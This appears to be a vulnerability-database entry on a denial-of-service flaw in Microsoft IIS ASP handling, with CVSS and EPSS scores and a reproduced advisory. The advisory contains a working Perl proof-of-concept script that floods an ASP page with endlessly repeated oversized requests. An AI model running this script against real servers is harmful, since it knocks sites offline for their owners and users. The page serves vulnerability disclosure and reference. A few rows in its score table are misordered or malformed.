CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability."
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
4.3
AV:N/AC:M/Au:N/C:N/I:N/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
69.17%
–
–
2023-03-12
–
–
–
97.12%
–
2023-03-19
–
–
–
97.07%
–
2023-05-07
–
–
–
97.12%
–
2023-06-25
–
–
–
97.04%
–
2023-08-20
–
–
–
96.83%
–
2023-10-08
–
–
–
96.85%
–
2023-11-19
–
–
–
96.73%
–
2023-12-31
–
–
–
96.9%
–
2024-03-31
–
–
–
96.96%
–
2024-06-02
–
–
–
97.02%
–
2024-06-23
–
–
–
97.06%
–
2025-03-16
–
–
–
96.99%
–
2025-01-19
–
–
–
97.06%
–
2025-03-18
–
–
–
–
87.01%
2025-03-18
–
–
–
–
87.01,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Affected Vendors
Microsoft
Affected Products
Only Microsoft IIS 6.0 was tested successfully
On a Windows Server 2003 SP2 System
The System was NOT updated to the latest patches during testing.
Since tests “in the wild” have shown the attack to be real this advisory was released.
Vulnerability Details
The vulnerability allows remote unauthenticated attackers to force the IIS server to become
unresponsive until the IIS service is restarted manually by the administrator.
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a
Post Form value. When the following ASP script is hosted by IIS the attacker can run the
attack:
<%
Dim variable
variable = Request.Form(“FOOBAR”)
%>
This small script reads out a POST request argument from the client side.
The exploit is simple: The attacker sends a POST request to the ASP site which reads out
POST arguments. The POST request includes > 40000 request parameters and is sent in the
form of an application/x-www-form-urlencoded encoding type.
The result is that one IIS worker process crashes because of a stack overflow (here stack
exhaustion). Tests have shown that five consecutive requests of this type will cause the
default application pool to be disabled because of a series of failures of the IIS worker
processes. The IIS shows a “Service Unavailable” response to requesting clients until the
World Wide Web Publishing Service is restarted manually by the administrator.
PoC Exploit
# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl <host> <asp page>
use IO::Socket;
$|=1;
$host = $ARGV[0];
$script = $ARGV[1];
while(1) {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
$write = "C=A&" x 40000;
print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
."Content-Length:". length($write) ."\r\n\r\n" . $write;
print ".";
while(<$sock>) {
print;
}
}
Exploit-DB Notes:
In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems: Windows Server 2003 Standard SP2, Windows Server 2003 Standard SP1, Windows Server 2003 Standard SP0
Products Mentioned
Configuraton 0
Microsoft>>Internet_information_server >> Version 6.0